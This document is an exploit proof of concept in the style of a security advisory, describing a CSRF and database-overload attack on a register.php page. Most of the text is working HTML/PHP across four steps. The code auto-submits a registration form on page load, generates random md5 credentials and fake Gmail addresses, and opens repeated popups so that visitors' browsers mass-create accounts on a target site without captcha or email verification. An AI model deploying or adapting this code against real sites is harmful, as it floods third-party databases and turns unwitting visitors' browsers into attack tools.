.:: .::            .::            
                  .:: .::        .:  .::            
.:: .::  .::  .:: .:: .:: .::::    .:.: .:   .::    
 .::  .::.::  .:: .:: .::.::    .::  .::   .:   .:: 
 .::  .::.::  .:: .:: .::  .::: .::  .::  .::::: .::
 .::  .::.::  .:: .:: .::    .::.::  .::  .:        
.:::  .::  .::.::.:::.:::.:: .::.::   .::   .::::   
                                                    
                 .::                   
    .::          .::                   
  .::  .::       .::   .::    .::   .::
.::     .::  .:: .:: .::  .::  .:: .:: 
.::      .::.:   .::.::   .::    .:::  
 .::    .:: .:   .::.::   .::     .::  
   .:::      .:: .::  .:: .:::   .::   
                               .::  

#Author: Emiliano Febbi (*emilianofebbi.1994@gmail.com*)
#Web Site Creator => ???
#Dork => ???
#CMS => ???
#Vulnz => CSRF/DB overload register.php
#Date => 25/03/2023
#view => https://internetcafe.altervista.org/connect.html

*PoC*
[code]
________________________________________________________________________________________________________
#1 - Steal register form of page register.php => example:(*must be no captcha and does not verify email*)|
_________________________________________________________________________________________________________|

<html>
<head><title>CSRF/DB overload</title></head>
<body>
<form method="post" action="http://www.site.com/forum/register.php" id="default" name="default">  /*<= the page you find in the form plus the address in full*/
Username: <input type="Text" name="username"/><br>
Password: <input type="Text" name="password"/><br>
Your E-mail: <input type="Text" name="email"/><br>
<input type="submit" value="go"/>
</form>
</body>
</html>

and save the file *csrf.php*
__________________________________________________________________________________________________________
#2 - Modify file *csrf.php* so:                                                                           |
__________________________________________________________________________________________________________|

<html>
<head><title>CSRF/DB overload</title></head>
<body>
<body onload="document.createElement('form').submit.call(document.getElementById('default'))">   /*<= add this string*/

<form method="post" action="http://www.site.com/forum/register.php" id="default" name="default">  /*<= the page you find in the form plus the address in full*/
Username: <input type="Text" name="username"/><br>
Password: <input type="Text" name="password"/><br>  /*you need modify values of inputs*/
Your E-mail: <input type="Text" name="email"/><br>
<input type="submit" value="go"/>
</form>
</body>
</html>
and save the file *csrf.php*
___________________________________________________________________________________________________________
#3 - This is a last modify of file *csrf.php*:                                                             |
___________________________________________________________________________________________________________|
<?
$str = rand();
$result = md5($str);
?>

<html>
<head><title>CSRF/DB overload</title></head>
<body>
<body onload="document.createElement('form').submit.call(document.getElementById('default'))">

<form method="post" action="http://www.site.com/forum/register.php" id="default" name="default">  /*<= the page you find in the form plus the address in full*/
Username: <input type="Text" name="username" value="<? echo $result; ?>"/><br>     /*=>here you need modify<=*/
Password: <input type="Text" name="password" value="<? echo $result; ?>"/><br>     /*=>here you need modify<=*/
Your E-mail: <input type="Text" name="email" value="<? print uniqid(null, true); ?>@gmail.com"/><br>   /*=>here you need modify<=*/
<input type="submit" value="go"/>
</form>
</body>
</html>
and save the file *csrf.php*
________________________________________________________________________________________________________________
#4 - the *connect.html*:                                                                                         |
Create new file (connect.html) so:                                                                               |                                                                                                          
________________________________________________________________________________________________________________ |
<html>
<head><title>CSRF/DB overload</title></head>
<body>
<script type="text/javascript">
<!--
var stile = "top=10, left=10, width=250, height=200, status=no, menubar=no, toolbar=no scrollbars=no";
function Popup(apri)
{
window.open(apri, "", stile);
}
//-->
</script>
<a href="javascript:Popup('csrf.php')">connect!</a>
<a href="javascript:Popup('csrf.php')">connect!</a>
<a href="javascript:Popup('csrf.php')">connect!</a>
</body>
</html>

save so connect.html and finish!
_________________________________________________________________________________________________________________
._________.
*/ ///______I
) . /_(_)
/__/*PoC End*